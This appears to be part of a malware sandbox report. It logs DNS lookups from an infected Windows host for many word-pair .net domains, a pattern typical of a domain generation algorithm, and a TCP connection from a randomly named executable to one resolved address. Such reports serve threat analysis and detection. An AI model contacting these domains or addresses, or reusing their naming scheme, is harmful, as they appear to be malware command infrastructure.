Aug 5, 2024 16:23:24.032265902 CEST | 192.168.2.7 | 1.1.1.1 | 0xcd72 | Standard query (0) | experienceconsider.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:24.278073072 CEST | 192.168.2.7 | 1.1.1.1 | 0xf72f | Standard query (0) | freshfriend.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:24.289673090 CEST | 192.168.2.7 | 1.1.1.1 | 0xa8f4 | Standard query (0) | experiencefriend.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:24.539998055 CEST | 192.168.2.7 | 1.1.1.1 | 0x2a4c | Standard query (0) | gentlemanlaughter.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:24.550476074 CEST | 192.168.2.7 | 1.1.1.1 | 0xdebe | Standard query (0) | alreadylaughter.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:24.729669094 CEST | 192.168.2.7 | 1.1.1.1 | 0xa304 | Standard query (0) | gentlemanfancy.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:24.982945919 CEST | 192.168.2.7 | 1.1.1.1 | 0xad30 | Standard query (0) | alreadyfancy.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:24.995552063 CEST | 192.168.2.7 | 1.1.1.1 | 0x4323 | Standard query (0) | gentlemanconsider.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:25.009118080 CEST | 192.168.2.7 | 1.1.1.1 | 0xb373 | Standard query (0) | alreadyconsider.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:25.019994974 CEST | 192.168.2.7 | 1.1.1.1 | 0x1406 | Standard query (0) | gentlemanfriend.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:25.274055004 CEST | 192.168.2.7 | 1.1.1.1 | 0xce48 | Standard query (0) | alreadyfriend.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:26.153218985 CEST | 192.168.2.7 | 1.1.1.1 | 0xcccf | Standard query (0) | followlaughter.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:26.174304962 CEST | 192.168.2.7 | 1.1.1.1 | 0x5336 | Standard query (0) | memberlaughter.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:26.184897900 CEST | 192.168.2.7 | 1.1.1.1 | 0x7589 | Standard query (0) | followfancy.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:26.428072929 CEST | 192.168.2.7 | 1.1.1.1 | 0xe3c1 | Standard query (0) | memberfancy.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:26.448745012 CEST | 192.168.2.7 | 1.1.1.1 | 0x88cb | Standard query (0) | followconsider.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:26.460000992 CEST | 192.168.2.7 | 1.1.1.1 | 0x75b7 | Standard query (0) | memberconsider.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:26.473237991 CEST | 192.168.2.7 | 1.1.1.1 | 0xbdad | Standard query (0) | followfriend.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:27.647510052 CEST | 192.168.2.7 | 1.1.1.1 | 0x1fb5 | Standard query (0) | memberfriend.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:27.892193079 CEST | 192.168.2.7 | 1.1.1.1 | 0x33bd | Standard query (0) | beginlaughter.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:27.904778004 CEST | 192.168.2.7 | 1.1.1.1 | 0xf139 | Standard query (0) | knownlaughter.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:24:19.329459906 CEST | 192.168.2.7 | 1.1.1.1 | 0x5c47 | Standard query (0) | fightgeneral.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:24:20.344276905 CEST | 192.168.2.7 | 1.1.1.1 | 0x83c2 | Standard query (0) | partyinclude.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:24:21.609978914 CEST | 192.168.2.7 | 1.1.1.1 | 0xafd8 | Standard query (0) | fightinclude.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:24:22.641103029 CEST | 192.168.2.7 | 1.1.1.1 | 0x7ea5 | Standard query (0) | partynorth.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:24:23.672787905 CEST | 192.168.2.7 | 1.1.1.1 | 0xf4d0 | Standard query (0) | fightnorth.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:24:24.703435898 CEST | 192.168.2.7 | 1.1.1.1 | 0xaf5c | Standard query (0) | freshbranch.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:24:25.719153881 CEST | 192.168.2.7 | 1.1.1.1 | 0xd700 | Standard query (0) | experiencebranch.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:24:26.734932899 CEST | 192.168.2.7 | 1.1.1.1 | 0xe137 | Standard query (0) | freshbelieve.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:24:27.750502110 CEST | 192.168.2.7 | 1.1.1.1 | 0x66f0 | Standard query (0) | experiencebelieve.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:24:28.766252041 CEST | 192.168.2.7 | 1.1.1.1 | 0xdb1a | Standard query (0) | freshreceive.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:24:30.016100883 CEST | 192.168.2.7 | 1.1.1.1 | 0xc187 | Standard query (0) | experiencereceive.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:24:31.033252954 CEST | 192.168.2.7 | 1.1.1.1 | 0x5c0c | Standard query (0) | freshquarter.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:24:32.281800985 CEST | 192.168.2.7 | 1.1.1.1 | 0x2692 | Standard query (0) | experiencequarter.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:24:33.656968117 CEST | 192.168.2.7 | 1.1.1.1 | 0x51d1 | Standard query (0) | gentlemanbranch.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:24:34.907303095 CEST | 192.168.2.7 | 1.1.1.1 | 0xaa78 | Standard query (0) | alreadybranch.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:24:35.922257900 CEST | 192.168.2.7 | 1.1.1.1 | 0xb06a | Standard query (0) | gentlemanbelieve.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:24:37.172446966 CEST | 192.168.2.7 | 1.1.1.1 | 0x9d5c | Standard query (0) | alreadybelieve.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:24:38.422349930 CEST | 192.168.2.7 | 1.1.1.1 | 0x82e4 | Standard query (0) | gentlemanreceive.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:24:39.438189983 CEST | 192.168.2.7 | 1.1.1.1 | 0x2386 | Standard query (0) | alreadyreceive.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:24:40.688630104 CEST | 192.168.2.7 | 1.1.1.1 | 0xe78f | Standard query (0) | gentlemanquarter.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:24:41.703542948 CEST | 192.168.2.7 | 1.1.1.1 | 0xcf58 | Standard query (0) | alreadyquarter.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:24:42.719425917 CEST | 192.168.2.7 | 1.1.1.1 | 0x2d4f | Standard query (0) | followbranch.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:24:43.734996080 CEST | 192.168.2.7 | 1.1.1.1 | 0x3267 | Standard query (0) | memberbranch.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:24:44.753750086 CEST | 192.168.2.7 | 1.1.1.1 | 0x3987 | Standard query (0) | followbelieve.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:24:45.766043901 CEST | 192.168.2.7 | 1.1.1.1 | 0x560d | Standard query (0) | memberbelieve.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:24:46.781923056 CEST | 192.168.2.7 | 1.1.1.1 | 0xc023 | Standard query (0) | followreceive.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:24:49.797646046 CEST | 192.168.2.7 | 1.1.1.1 | 0x4a36 | Standard query (0) | followquarter.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:24:50.813277960 CEST | 192.168.2.7 | 1.1.1.1 | 0x56e9 | Standard query (0) | memberquarter.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:24:51.969788074 CEST | 192.168.2.7 | 1.1.1.1 | 0x4074 | Standard query (0) | beginbranch.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:24:52.985311985 CEST | 192.168.2.7 | 1.1.1.1 | 0x53e1 | Standard query (0) | knownbranch.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:24:53.978466034 CEST | 192.168.2.7 | 1.1.1.1 | 0xc849 | Standard query (0) | beginbelieve.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:24:55.157414913 CEST | 192.168.2.7 | 1.1.1.1 | 0x4c7e | Standard query (0) | knownbelieve.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:24:56.079106092 CEST | 192.168.2.7 | 1.1.1.1 | 0x1fb0 | Standard query (0) | beginreceive.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:24:56.969827890 CEST | 192.168.2.7 | 1.1.1.1 | 0xeab3 | Standard query (0) | knownreceive.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:24:57.828845024 CEST | 192.168.2.7 | 1.1.1.1 | 0x1b9e | Standard query (0) | beginquarter.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:24:59.438075066 CEST | 192.168.2.7 | 1.1.1.1 | 0x29ba | Standard query (0) | knownquarter.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:24:59.448775053 CEST | 192.168.2.7 | 1.1.1.1 | 0xddac | Standard query (0) | summerbranch.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:24:59.460437059 CEST | 192.168.2.7 | 1.1.1.1 | 0x1534 | Standard query (0) | crowdbranch.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:24:59.474095106 CEST | 192.168.2.7 | 1.1.1.1 | 0xac3c | Standard query (0) | summerbelieve.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:24:59.485200882 CEST | 192.168.2.7 | 1.1.1.1 | 0x3733 | Standard query (0) | crowdbelieve.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:24:59.497925997 CEST | 192.168.2.7 | 1.1.1.1 | 0x720a | Standard query (0) | summerreceive.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:24:59.509829044 CEST | 192.168.2.7 | 1.1.1.1 | 0xa86c | Standard query (0) | crowdreceive.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Aug 5, 2024 16:22:56.758208036 CEST | 1.1.1.1 | 192.168.2.7 | 0xf93d | No error (0) | time.windows.com | twc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Aug 5, 2024 16:22:59.072036982 CEST | 1.1.1.1 | 192.168.2.7 | 0x910a | Name error (3) | womanclear.net | none | none | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:22:59.314816952 CEST | 1.1.1.1 | 192.168.2.7 | 0x7047 | Name error (3) | smokeclear.net | none | none | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:22:59.488140106 CEST | 1.1.1.1 | 192.168.2.7 | 0x94ad | Name error (3) | womangeneral.net | none | none | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:22:59.501302004 CEST | 1.1.1.1 | 192.168.2.7 | 0xeb47 | Name error (3) | smokegeneral.net | none | none | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:22:59.515988111 CEST | 1.1.1.1 | 192.168.2.7 | 0xdbbe | Name error (3) | womaninclude.net | none | none | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:22:59.528374910 CEST | 1.1.1.1 | 192.168.2.7 | 0x6697 | Name error (3) | smokeinclude.net | none | none | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:22:59.768841028 CEST | 1.1.1.1 | 192.168.2.7 | 0x6e1b | Name error (3) | womannorth.net | none | none | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:22:59.780859947 CEST | 1.1.1.1 | 192.168.2.7 | 0xd2ba | Name error (3) | smokenorth.net | none | none | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:22:59.797418118 CEST | 1.1.1.1 | 192.168.2.7 | 0x4731 | Name error (3) | partyclear.net | none | none | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:22:59.818885088 CEST | 1.1.1.1 | 192.168.2.7 | 0x3847 | Name error (3) | fightclear.net | none | none | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:22:59.994450092 CEST | 1.1.1.1 | 192.168.2.7 | 0x3ec1 | No error (0) | partygeneral.net | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:22:59.994450092 CEST | 1.1.1.1 | 192.168.2.7 | 0x3ec1 | No error (0) | partygeneral.net | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:00.481833935 CEST | 1.1.1.1 | 192.168.2.7 | 0x820b | Name error (3) | fightgeneral.net | none | none | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:00.494982958 CEST | 1.1.1.1 | 192.168.2.7 | 0x99fe | Name error (3) | partyinclude.net | none | none | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                          Aug 5, 2024 16:23:00.507364988 CEST1.1.1.1192.168.2.70xd8b1Name error (3)fightinclude.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:00.518084049 CEST1.1.1.1192.168.2.70x5209Name error (3)partynorth.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:00.768618107 CEST1.1.1.1192.168.2.70x2d7aName error (3)fightnorth.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:00.781193972 CEST1.1.1.1192.168.2.70x5f2aName error (3)freshbranch.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:00.793140888 CEST1.1.1.1192.168.2.70xc9c9Name error (3)experiencebranch.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:00.804402113 CEST1.1.1.1192.168.2.70x16d1Name error (3)freshbelieve.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:00.817480087 CEST1.1.1.1192.168.2.70x5f15Name error (3)experiencebelieve.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:00.829871893 CEST1.1.1.1192.168.2.70x1ee3Name error (3)freshreceive.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:00.857202053 CEST1.1.1.1192.168.2.70x37b4Name error (3)experiencereceive.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:00.884138107 CEST1.1.1.1192.168.2.70xa4abName error (3)freshquarter.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:01.125931978 CEST1.1.1.1192.168.2.70x6fcdName error (3)experiencequarter.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:01.139688969 CEST1.1.1.1192.168.2.70xccacName error (3)gentlemanbranch.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:01.151774883 CEST1.1.1.1192.168.2.70xe403Name error (3)alreadybranch.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:01.166131020 CEST1.1.1.1192.168.2.70xdaefName error (3)gentlemanbelieve.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:01.179567099 CEST1.1.1.1192.168.2.70x677bName error (3)alreadybelieve.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:01.191646099 CEST1.1.1.1192.168.2.70x39faName error (3)gentlemanreceive.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:01.204541922 CEST1.1.1.1192.168.2.70x2c0bName error (3)alreadyreceive.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:01.446283102 CEST1.1.1.1192.168.2.70x4b02Name error (3)gentlemanquarter.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:01.459589958 CEST1.1.1.1192.168.2.70x2644Name error (3)alreadyquarter.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:01.474405050 CEST1.1.1.1192.168.2.70x4cbaName error (3)followbranch.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:01.486325979 CEST1.1.1.1192.168.2.70xeb68Name error (3)memberbranch.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:01.733985901 CEST1.1.1.1192.168.2.70x2bb8Name error (3)followbelieve.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:01.987286091 CEST1.1.1.1192.168.2.70x8529Name error (3)memberbelieve.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:02.155164003 CEST1.1.1.1192.168.2.70x6965Name error (3)followreceive.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:02.489639044 CEST1.1.1.1192.168.2.70xa408No error (0)memberreceive.net35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:03.294171095 CEST1.1.1.1192.168.2.70x6b64Name error (3)followquarter.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:03.306982040 CEST1.1.1.1192.168.2.70xe563Name error (3)memberquarter.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:03.327703953 CEST1.1.1.1192.168.2.70x1065Name error (3)beginbranch.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:03.603338003 CEST1.1.1.1192.168.2.70x4e44Name error (3)knownbranch.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:04.834971905 CEST1.1.1.1192.168.2.70x94cName error (3)beginbelieve.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:04.840406895 CEST1.1.1.1192.168.2.70x94cName error (3)beginbelieve.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:04.846358061 CEST1.1.1.1192.168.2.70xa61bName error (3)knownbelieve.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:05.089771986 CEST1.1.1.1192.168.2.70x60b4Name error (3)beginreceive.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:05.340581894 CEST1.1.1.1192.168.2.70xc3b8Name error (3)knownreceive.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:05.584233999 CEST1.1.1.1192.168.2.70x9190Name error (3)beginquarter.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:05.597199917 CEST1.1.1.1192.168.2.70xa3ceName error (3)knownquarter.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:05.839589119 CEST1.1.1.1192.168.2.70x2466Name error (3)summerbranch.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:05.852792978 CEST1.1.1.1192.168.2.70x95d6Name error (3)crowdbranch.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:05.865334988 CEST1.1.1.1192.168.2.70xaa58Name error (3)summerbelieve.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:06.115442991 CEST1.1.1.1192.168.2.70x812Name error (3)crowdbelieve.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:06.127631903 CEST1.1.1.1192.168.2.70xe050Name error (3)summerreceive.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:06.490065098 CEST1.1.1.1192.168.2.70xec85Name error (3)crowdreceive.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:06.734385967 CEST1.1.1.1192.168.2.70xaf40Name error (3)summerquarter.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:06.746968031 CEST1.1.1.1192.168.2.70xd1e9Name error (3)crowdquarter.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:07.081515074 CEST1.1.1.1192.168.2.70xefe4No error (0)thoughtbranch.net34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:07.865104914 CEST1.1.1.1192.168.2.70xa031Name error (3)waterbranch.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:07.879404068 CEST1.1.1.1192.168.2.70x3d40Name error (3)thoughtbelieve.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:08.140649080 CEST1.1.1.1192.168.2.70xf352Name error (3)waterbelieve.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:08.153228998 CEST1.1.1.1192.168.2.70x1e49Name error (3)thoughtreceive.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:08.167778015 CEST1.1.1.1192.168.2.70x29ecName error (3)waterreceive.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:08.408706903 CEST1.1.1.1192.168.2.70xbcd1Name error (3)thoughtquarter.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:08.422204971 CEST1.1.1.1192.168.2.70xd06cName error (3)waterquarter.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:08.434189081 CEST1.1.1.1192.168.2.70xe8ddName error (3)womanbranch.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:08.676603079 CEST1.1.1.1192.168.2.70x31e5Name error (3)smokebranch.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:08.689861059 CEST1.1.1.1192.168.2.70xfc2fNo error (0)womanbelieve.net15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:08.689861059 CEST1.1.1.1192.168.2.70xfc2fNo error (0)womanbelieve.net3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.345818043 CEST1.1.1.1192.168.2.70x3e92Name error (3)smokebelieve.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.357867956 CEST1.1.1.1192.168.2.70x8bb3Name error (3)womanreceive.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.368531942 CEST1.1.1.1192.168.2.70x852aName error (3)smokereceive.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.381783962 CEST1.1.1.1192.168.2.70x43f9Name error (3)womanquarter.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.393115044 CEST1.1.1.1192.168.2.70x6394Name error (3)smokequarter.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.403856039 CEST1.1.1.1192.168.2.70x684dName error (3)partybranch.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.415358067 CEST1.1.1.1192.168.2.70x5ee0Name error (3)fightbranch.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.591981888 CEST1.1.1.1192.168.2.70xd087No error (0)partybelieve.net15.197.192.55A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:10.131587029 CEST1.1.1.1192.168.2.70xc6a6Name error (3)fightbelieve.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:10.144226074 CEST1.1.1.1192.168.2.70xf832Name error (3)partyreceive.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.333298922 CEST1.1.1.1192.168.2.70x480eName error (3)fightreceive.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.339821100 CEST1.1.1.1192.168.2.70x480eName error (3)fightreceive.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.584297895 CEST1.1.1.1192.168.2.70x42b2Name error (3)partyquarter.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.595113039 CEST1.1.1.1192.168.2.70x2855Name error (3)fightquarter.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.607228041 CEST1.1.1.1192.168.2.70x970Name error (3)freshhonor.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.619980097 CEST1.1.1.1192.168.2.70xdcd4Name error (3)experiencehonor.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.869426966 CEST1.1.1.1192.168.2.70xa235Name error (3)freshneither.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.881941080 CEST1.1.1.1192.168.2.70x6e26Name error (3)experienceneither.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.123236895 CEST1.1.1.1192.168.2.70x862bName error (3)freshsystem.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.136425018 CEST1.1.1.1192.168.2.70x7de3Name error (3)experiencesystem.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.148866892 CEST1.1.1.1192.168.2.70x13c0Name error (3)freshtrust.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.387614965 CEST1.1.1.1192.168.2.70xf617Name error (3)experiencetrust.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.403403044 CEST1.1.1.1192.168.2.70x4524Name error (3)gentlemanhonor.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.416208982 CEST1.1.1.1192.168.2.70xd3bbName error (3)alreadyhonor.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.669958115 CEST1.1.1.1192.168.2.70x1557Name error (3)gentlemanneither.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.690047026 CEST1.1.1.1192.168.2.70x92f4Name error (3)alreadyneither.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.703558922 CEST1.1.1.1192.168.2.70xcebfName error (3)gentlemansystem.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:58.484996080 CEST1.1.1.1192.168.2.70x1b9eName error (3)beginquarter.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:59.447949886 CEST1.1.1.1192.168.2.70x29baName error (3)knownquarter.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:59.459800959 CEST1.1.1.1192.168.2.70xddacName error (3)summerbranch.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:59.473557949 CEST1.1.1.1192.168.2.70x1534Name error (3)crowdbranch.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:59.484698057 CEST1.1.1.1192.168.2.70xac3cName error (3)summerbelieve.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:59.497405052 CEST1.1.1.1192.168.2.70x3733Name error (3)crowdbelieve.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:59.509195089 CEST1.1.1.1192.168.2.70x720aName error (3)summerreceive.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:24:59.670346975 CEST1.1.1.1192.168.2.70xa86cName error (3)crowdreceive.netnonenoneA (IP address)IN (0x0001)false
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.7  49700        3.33.130.190    80                3452  C:\whfkpbh\idtpqzltyfy.exe

Timestamp                            Bytes transferred  Direction  Data
